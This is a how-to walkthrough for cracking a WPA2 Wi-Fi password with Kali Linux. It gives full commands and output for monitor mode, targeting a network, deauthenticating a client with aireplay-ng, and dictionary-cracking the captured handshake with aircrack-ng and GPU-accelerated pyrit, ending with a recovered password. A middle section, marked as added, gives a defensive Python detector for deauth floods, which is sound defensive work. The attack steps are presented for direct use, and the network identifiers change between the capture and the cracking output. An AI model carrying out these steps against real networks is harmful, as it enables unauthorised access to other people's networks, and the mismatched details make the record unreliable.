A hands-on example of wireless cracking with Kali

First you need a machine running Kali Linux, either a virtual machine or a physical box, and a wireless card that supports monitor mode.

root@kali:~# iwconfig 
wlan1     IEEE 802.11bg  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

lo        no wireless extensions.

Look up the device name of the wireless card.

root@kali:~# airmon-ng start wlan1


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID     Name
2772    dhclient
4415    wpa_supplicant


Interface       Chipset         Driver

wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Put the card into monitor mode.

airodump-ng mon0 lists every wireless network it can see.

Find the network you want to test and copy its BSSID.

root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0

 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135
 E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

When "WPA handshake:" appears in the header, the four-way handshake has been captured and cracking can begin.

If no handshake is captured, the following command can be used to attack the client and force it to re-associate and perform a new handshake:

aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one
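Seen from the network owner's side, a deauthentication burst like the one aireplay-ng sends above stands out in a monitor-mode capture: one source/destination pair emits many deauth frames within a second or two, whereas legitimate deauths (a client roaming or powering off) arrive singly. The following is an added example, not part of the original post: a sliding-window deauth counter run over constructed frame records that reuse the BSSID and station addresses from the airodump-ng output; the window and threshold values are assumptions.

```python
"""Flag deauthentication bursts in a stream of 802.11 management-frame records."""
from collections import defaultdict, deque

# Constructed sample records: (time_s, subtype, source addr, destination addr).
# A real monitor-mode capture yields these from the 802.11 header, where a
# deauthentication frame is management type 0, subtype 12. The addresses are
# the AP and station shown in the airodump-ng output above.
AP = "E4:D3:32:41:56:12"
STA = "64:B4:73:40:60:5C"
SAMPLE_FRAMES = (
    [(0.1 * i, "beacon", AP, "ff:ff:ff:ff:ff:ff") for i in range(30)]
    + [(0.10, "deauth", AP, STA)]                               # isolated: benign
    + [(1.20 + 0.02 * i, "deauth", AP, STA) for i in range(10)]  # injected burst
    + [(2.90, "deauth", STA, AP)]                               # station leaving: benign
)


def detect_deauth_flood(frames, window_s=1.0, threshold=8):
    """Sliding-window count of deauth frames per (source, destination) pair.

    Returns a list of alerts (source, destination, burst_start_s, peak_count),
    one per pair whose count inside `window_s` seconds reaches `threshold`.
    Assumed defaults: 8 deauths within one second is far above normal churn.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerts = {}
    for ts, subtype, src, dst in sorted(frames):
        if subtype != "deauth":
            continue
        key = (src, dst)
        window = recent[key]
        window.append(ts)
        while ts - window[0] > window_s:   # expire frames older than the window
            window.popleft()
        if len(window) >= threshold:
            start, peak = alerts.get(key, (window[0], 0))
            alerts[key] = (start, max(peak, len(window)))
    return [(src, dst, start, peak) for (src, dst), (start, peak) in alerts.items()]


if __name__ == "__main__":
    for src, dst, start, peak in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood: {src} -> {dst}, {peak} frames starting at t={start:.2f}s")
```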

Once the handshake has been captured, a dictionary can be run against the password.

root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
Opening nenew-21.cap
Read 18654 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)

Choosing first network as target.

Opening nenew-21.cap
Reading packets, please wait...

How fast this runs depends on your machine's performance, and even more on your dictionary.

On a physical machine with a reasonably good graphics card, the GPU can be used to accelerate the cracking; it is far more efficient than the CPU.

For installing the graphics driver, SDK and so on under Kali Linux, see the following links:

http://xiao106347.blog.163.com/blog/static/2159920782013113013549364

http://vistb.net/2011/08/how-to-crack-wifi-part-four/

http://blog.sina.com.cn/s/blog_56a70c040101exje.html

I used the GPU here and recovered the password very quickly.

root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'nenew-21.cap' (1/1)...
Parsed 14 packets (14 802.11-packets), got 1 AP(s)

Tried 4420221 PMKs so far; 86496 PMKs per second.

The password is 'qq123789'.

Reference: http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html